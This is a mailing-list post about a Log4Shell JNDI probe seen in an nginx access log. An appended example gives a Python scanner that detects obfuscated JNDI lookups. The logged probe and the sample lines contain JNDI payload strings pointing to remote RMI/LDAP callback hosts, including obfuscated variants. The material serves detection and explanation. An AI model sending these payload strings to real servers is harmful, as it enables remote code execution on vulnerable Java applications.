200 html return to log4j exploit

lists at lazygranch.com
Mon Dec 20 04:02:08 UTC 2021


I don't have any service using Java, so I don't believe I am subject to
this exploit. However, I am confused why it returned a 200 for this
request. The special characters in the URL are confusing.

200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

    log_format  main  '$status $remote_addr - $remote_user [$time_local] "$request" '
                      '$body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf. 

I now have a map to catch "jndi" in both the URL and the agent. So far so good,
not that it matters much. I just like to gather IP addresses from
hackers and block their host if it lacks eyeballs.


More information about the nginx mailing list
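Added example, not part of the original post or of nginx. The 200 in the pasted line is simply nginx serving "GET /"; the JNDI payload is not in the URL at all but in the Referer and User-Agent fields (the two quoted strings after the byte count in the poster's log_format), which nginx logs but never evaluates. A map that greps for the literal "jndi" will catch the ${lower:jndi} form shown, since the letters are still present, but misses probes that assemble the word from ${::-j}${::-n}... default-value lookups or URL-encode it in the request line. The script below parses the poster's exact log_format, folds those lookup tricks, and reports the client IP, the field that carried the probe, and the callback host. The log lines, IPs (RFC 5737 documentation addresses) and function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from the original post) in the poster's
# log_format: '$status $remote_addr - $remote_user [$time_local] "$request"
# $body_bytes_sent "$http_referer" "$http_user_agent" "$http_x_forwarded_for"'.
# Line 1 mirrors the posted probe, line 2 URL-encodes ${ in the query string,
# line 3 spells "jndi" with ${::-x} default-value lookups, line 4 is benign.
SAMPLE_LOG = """\
200 203.0.113.10 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://198.51.100.7:1389/x}" "${${lower:jndi}:${lower:rmi}://198.51.100.7:1389/x}" "-"
200 203.0.113.11 - - [17/Dec/2021:03:01:10 +0000] "GET /?q=%24%7Bjndi:ldap://198.51.100.8:1389/a%7D HTTP/1.1" 706 "-" "Mozilla/5.0" "-"
200 203.0.113.12 - - [17/Dec/2021:03:02:44 +0000] "GET / HTTP/1.1" 706 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.9:1389/b}" "-"
200 203.0.113.13 - - [17/Dec/2021:03:05:00 +0000] "GET /index.html HTTP/1.1" 706 "-" "Mozilla/5.0 (X11; Linux)" "-"
"""

# nginx (escape=default) writes a literal quote inside a variable as \x22,
# so [^"]* is a safe delimiter for each quoted field.
LOG_RE = re.compile(
    r'^(?P<status>\d{3}) (?P<remote_addr>\S+) - (?P<remote_user>\S+) '
    r'\[(?P<time_local>[^\]]+)\] "(?P<request>[^"]*)" (?P<body_bytes_sent>\d+) '
    r'"(?P<http_referer>[^"]*)" "(?P<http_user_agent>[^"]*)" '
    r'"(?P<http_x_forwarded_for>[^"]*)"$'
)

# Attacker-controlled fields that a Log4j-backed application might log.
SCANNED_FIELDS = ("request", "http_referer", "http_user_agent", "http_x_forwarded_for")

_LOWER_UPPER = re.compile(r'\$\{(lower|upper):([^${}]*)\}')      # ${lower:J} -> J
_DEFAULT_VAL = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')           # ${env:X:-j}, ${::-j} -> j
_JNDI = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)', re.I)


def fold_lookups(s: str) -> str:
    """Collapse the Log4j lookup tricks used to hide the literal 'jndi'.
    Repeats until stable so nested forms such as ${${lower:j}ndi:...} fold too.
    Case is left alone because the final JNDI match is case-insensitive."""
    prev = None
    while prev != s:
        prev = s
        s = _LOWER_UPPER.sub(lambda m: m.group(2), s)
        s = _DEFAULT_VAL.sub(r'\1', s)
    return s


def parse_line(line: str):
    """Parse one line of the poster's log format; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_jndi(value: str):
    """(scheme, callback_host) if the value carries a JNDI lookup, else None.
    URL-decodes first so %24%7Bjndi... in a request line is caught."""
    m = _JNDI.search(fold_lookups(unquote(value)))
    return (m.group("scheme").lower(), m.group("host")) if m else None


def scan_log(text: str):
    """One hit per (line, field) that carries a JNDI lookup."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in SCANNED_FIELDS:
            found = find_jndi(rec[field])
            if found:
                hits.append({"remote_addr": rec["remote_addr"], "field": field,
                             "scheme": found[0], "callback_host": found[1]})
    return hits


def offending_ips(text: str):
    """Client addresses that sent at least one JNDI probe (the block list)."""
    return {h["remote_addr"] for h in scan_log(text)}


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["remote_addr"]} -> {h["field"]}: {h["scheme"]}://{h["callback_host"]}')
    print("block:", sorted(offending_ips(SAMPLE_LOG)))
```

Run it against a real access log with `scan_log(open("/var/log/nginx/access.log").read())`; the callback host is worth collecting alongside the client address, since the LDAP/RMI listener is usually on different infrastructure from the scanner and is the part that actually serves the payload.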